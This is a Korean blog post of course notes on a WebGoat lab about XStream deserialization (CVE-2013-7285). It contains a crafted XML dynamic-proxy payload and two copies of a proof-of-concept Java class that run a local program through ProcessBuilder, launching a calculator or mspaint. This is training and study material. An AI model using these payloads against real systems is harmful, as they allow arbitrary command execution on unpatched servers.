XStream can be used for Remote Code Execution.
https://x-stream.github.io/CVE-2013-7285.html
XStream - CVE-2013-7285
CVE-2013-7285 Vulnerability CVE-2013-7285: XStream can be used for Remote Code Execution. Affected Versions All versions until and including version 1.4.6 are affected, but a workaround exist. Version 1.4.10 is affected if the security framework has not be
x-stream.github.io
Description
- The processed(처리된) stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that can execute arbitrary shell commands.
- 자바 객체로 만드는 시간에 처리된 stream은 이전에 쓰여진 객체를 다시 생성하기 위해 type 정보를 포함한다. XStream은 이 Type 정보를 바탕으로 새로운 객체를 만든다. 공격자는 처리된 입력 stream을 조작하고 임의의 shell 명령을 실행할 수 있는 객체를 대체해거나 삽입할 수 있다.
(unmarshaling : XML schema를 읽어서 자바 오브젝트로 만듦)
(marshlling : 자바 오브젝트를 XML로 변환)
Steps to Reproduce
- Create a simple interface e.g. named Contact and an implementation(구현) class. Use XStream to marshal such an object to XML. Replace the XML with following snippet and unmarshal it again with XStream:
- contact와 같이 간단한 인터페이스를 만든다. XStream을 사용하여 이러한 객체를 XML로 변환한다. XML을 다음과 같은 스티펫으로 대체하고 XStream으로 다시 unmarshal한다.
<contact class='dynamic-proxy'>
<interface>org.company.model.Contact</interface>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>calc.exe</string>
</command>
</target>
<action>start</action>
</handler>
</contact>XStream xstream = new XStream();
Contact contact = (Contact)xstream.fromXML(xml);code가 Contact 객체의 어떤 메소드를 호출하는 즉시 페이로드 실행. contact.getFirstName()과 같은 메소드 호출 시
WebGoat uses an XML document to add contacts to a contacts database.
직렬화 한다.
<contact>
<id>1</id>
<firstName>Bruce</firstName>
<lastName>Mayhew</lastName>
<email>webgoat@owasp.org</email>
</contact>문제에 필요한 java 인터페이스 : org.owasp.webgoat.vulnerable_components.Contact. 먼저 위의 연락처를 보내 정상적인 응답을 확인하고 CVE 취약성 설명서(인터넷 검색)을 읽고 취약성을 trigger하시오. 이 문제에서는 XML을 직접 입력하고 데이터를 수정할 수 있다. 연락처 XML을 WebGota에서 XStream.fromXML(xml)로 연락처 객체로 변환한다.
https://github.com/pwntester/XStreamPOC/blob/master/src/main/java/com/pwntester/xstreampoc/Main.java
GitHub - pwntester/XStreamPOC: POC for XStream RCE
POC for XStream RCE. Contribute to pwntester/XStreamPOC development by creating an account on GitHub.
github.com
http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/
RCE via XStream object deserialization
When researching SpringMVC RESTful APIs and their XXE vulnerabilities I found that XStream was not vulnerable to XXE because it ignored the <DOCTYPE /> blocks. Curious about it I decided to took a deeper look at XStream and found out that its not just a si
www.pwntester.com
git reset --hard 70cbf
git logMain.java
package com.pwntester.xstreampoc;
import java.io.IOException;
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
import java.beans.EventHandler;
import java.util.Set;
import java.util.TreeSet;
/**
* Created with IntelliJ IDEA.
* User: alvaro
* Date: 23/12/13
* Time: 13:39
* To change this template use File | Settings | File Templates.
*/
public class Main {
public static void main(String[] args) throws IOException {
XStream xstream = new XStream(new DomDriver()) {{
processAnnotations(Contact.class);
}};
// 직렬화
Set<Comparable> set = new TreeSet<Comparable>();
set.add("foo");
// foo 추가 후 정렬
set.add(EventHandler.create(Comparable.class, new ProcessBuilder("/Applications/Calculator.app/Contents/MacOS/Calculator"), "start"));
// comparable을 호출하면 다음 메소드가 호출된다. 현재는macos의 계산기.
//String payload2 = xstream.toXML(set);
//System.out.println(payload2);
// 직렬화
String payload = "<sorted-set>" +
"<string>foo</string>" +
"<dynamic-proxy>" +
"<interface>java.lang.Comparable</interface>" +
"<handler class=\"java.beans.EventHandler\">" +
" <target class=\"java.lang.ProcessBuilder\">" +
" <command>" +
// 변경
" <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>" +
" </command>" +
" </target>" +
" <action>start</action>" +
"</handler>" +
"</dynamic-proxy>" +
"</sorted-set>";
Contact c = (Contact) xstream.fromXML(payload);
}
}cmd : where mspaint
공격 코드 main.java
package com.pwntester.xstreampoc;
import java.io.IOException;
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
import java.beans.EventHandler;
import java.util.Set;
import java.util.TreeSet;
/**
* Created with IntelliJ IDEA.
* User: alvaro
* Date: 23/12/13
* Time: 13:39
* To change this template use File | Settings | File Templates.
*/
public class Main {
public static void main(String[] args) throws IOException {
XStream xstream = new XStream(new DomDriver()) {{
processAnnotations(Contact.class);
}};
//Set<Comparable> set = new TreeSet<Comparable>();
//set.add("foo");
//set.add(EventHandler.create(Comparable.class, new ProcessBuilder("/Applications/Calculator.app/Contents/MacOS/Calculator"), "start"));
//String payload2 = xstream.toXML(set);
//System.out.println(payload2);
String payload = "<sorted-set>" +
"<string>foo</string>" +
"<dynamic-proxy>" +
"<interface>java.lang.Comparable</interface>" +
"<handler class=\"java.beans.EventHandler\">" +
" <target class=\"java.lang.ProcessBuilder\">" +
" <command>" +
" <string>C:\\Windows\\System32\\mspaint.exe</string>" +
" </command>" +
" </target>" +
" <action>start</action>" +
"</handler>" +
"</dynamic-proxy>" +
"</sorted-set>";
Contact c = (Contact) xstream.fromXML(payload);
}
}xstream-1.4.6.jar 필요 - 카페 다운로드 - com 밑에 thoughtworks만 압축해제
윙,,, 컴파일이 안돌아감,,,,
'강의 및 교육 > Inflearn - Webgoat' 카테고리의 다른 글
| SQL Injection (mitigation) (0) | 2022.03.08 |
|---|---|
| SQL Injection (advanced) (0) | 2022.03.07 |
| SQL Injection (intro) (0) | 2022.03.06 |
| Challenges (0) | 2022.03.05 |
| Server-Side Request Forgery - 3, 4 (0) | 2022.03.03 |
